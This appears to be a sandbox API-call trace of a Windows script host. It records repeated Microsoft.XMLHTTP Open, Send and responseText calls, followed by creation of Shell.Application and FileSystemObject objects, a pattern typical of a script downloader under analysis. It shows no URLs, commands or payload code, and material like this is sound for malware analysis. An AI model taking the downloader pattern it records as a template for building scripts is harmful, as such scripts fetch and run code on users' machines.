	[0257.060] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0257.060] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0257.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0257.060] ??2@YAPEAX_K@Z () returned 0x62f310
	[0257.060] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0257.060] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0257.060] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0257.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0257.060] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0257.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.060] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0257.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0257.060] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0257.061] SysStringLen (param_1=0x0) returned 0x0
	[0257.061] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0257.061] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0257.061] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0257.061] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0257.061] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0257.061] ??2@YAPEAX_K@Z () returned 0x62f330
	[0257.061] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0257.061] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0257.061] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0257.061] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0257.061] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0257.061] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.061] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0257.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0257.062] longjmp () 
	[0257.062] longjmp () 
	[0257.062] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0257.062] SysStringLen (param_1=0x0) returned 0x0
	[0257.062] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0257.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0257.062] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0257.062] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0257.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7828) returned 0x0
	[0257.062] ??2@YAPEAX_K@Z () returned 0x62f310
	[0257.062] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7828, pUnkSite=0x62f310) 
	[0257.062] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0257.062] XMLHTTPRequest:IUnknown:Release (This=0x49c7828) returned 0x0
	[0257.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0257.063] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0257.063] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.063] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0257.063] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0257.063] longjmp () 
	[0257.063] longjmp () 
	[0257.063] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0257.063] SysStringLen (param_1=0x0) returned 0x0
	[0257.063] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0257.063] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0257.064] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0257.064] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0257.064] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0257.064] ??2@YAPEAX_K@Z () returned 0x62f330
	[0257.064] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0257.064] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0257.064] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0257.064] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0257.064] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0257.064] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.064] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0257.064] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0257.064] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.064] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0257.065] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0258.172] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0258.172] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0258.173] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0258.173] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0258.173] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0258.173] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0258.173] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0258.173] SysStringLen (param_1=0x0) returned 0x0
	[0258.173] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0258.173] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0258.173] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0258.173] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0258.173] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0258.173] ??2@YAPEAX_K@Z () returned 0x62f350
	[0258.173] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0258.173] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0258.174] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0258.174] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0258.174] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0258.174] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0258.174] SysStringLen (param_1=0x0) returned 0x0
	[0258.174] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0258.176] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0258.176] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0258.176] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0258.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0258.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0258.177] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0259.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0259.186] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0259.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0259.187] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0259.187] SysStringLen (param_1=0x0) returned 0x0
	[0259.187] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0259.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
